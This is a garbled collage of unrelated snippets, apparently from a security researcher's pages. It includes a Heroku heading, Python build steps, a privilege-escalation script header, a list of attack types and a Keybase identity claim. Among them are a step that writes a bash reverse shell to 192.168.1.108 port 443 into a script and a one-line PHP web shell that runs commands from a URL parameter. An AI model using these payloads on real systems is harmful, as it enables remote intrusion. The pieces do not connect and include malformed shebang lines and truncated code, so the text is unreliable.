- Heroku app Deployment
I faced an issue while executing any command using the .run command, as it doesn't support white spaces and raises an exception (for example, ls index.html).
I figured it out by creating a .sh file with a limited-privilege session (www-data) in the /html directory.
echo "#! bin/bash" > abc.sh
echo $'\n' >> abc.sh
echo "bash -i >& /dev/tcp/192.168.1.108/443 0>&1" >>abc.sh
chmod +x abc.sh
Now in HexChat, execute:
<?php
system($_GET['cmd']);
?>
#!/usr/env python
###############################################################################################################
## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script
## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
##-------------------------------------------------------------------------------------------------------------
## [Details]:
## This script is intended to be executed locally on a Linux box to enumerate basic system info and
## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text
## passwords and applicable exploits.
curl -OL http://www.python.org/ftp/python/2.7.11/Python-2.7.11.tgz
tar xzvf Python-2.7.11.tgz
cd Python-2.7.11
./configure --prefix=/usr/local --enable-shared
make
make install
#!/usr/bin/env python
import sys

if __name__ == "__main__":
    # Expect exactly one argument: the file of names to process.
    if len(sys.argv) != 2:
        print("usage: %s names.txt" % (sys.argv[0]))
        sys.exit(0)
    for line in open(sys.argv[1]):
        # Keep only letters and spaces from each line.
        name = ''.join([c for c in line if c == " " or c.isalpha()])
# Store this file in ~/.pystartup,
# set "export PYTHONSTARTUP=/home/user/.pystartup"
#
# Note that PYTHONSTARTUP does *not* expand "~", so you have to put in the
# full path to your home directory.
import atexit
import os
import readline
import rlcompleter
- Arbitrary file access
- Binary planting
- Blind SQL Injection
- Blind XPath Injection
- Brute force attack
- Buffer overflow attack
- Cache Poisoning
- Cash Overflow
- Clickjacking
- Command injection attacks
I hereby claim:
- I am avicoder on github.
- I am avicoder (https://keybase.io/avicoder) on keybase.
- I have a public key ASA5E3ToP1__j0WJ0hVsfEKPF-t9pWa1Ka31uZpGM32rawo
To claim this, I am signing this object: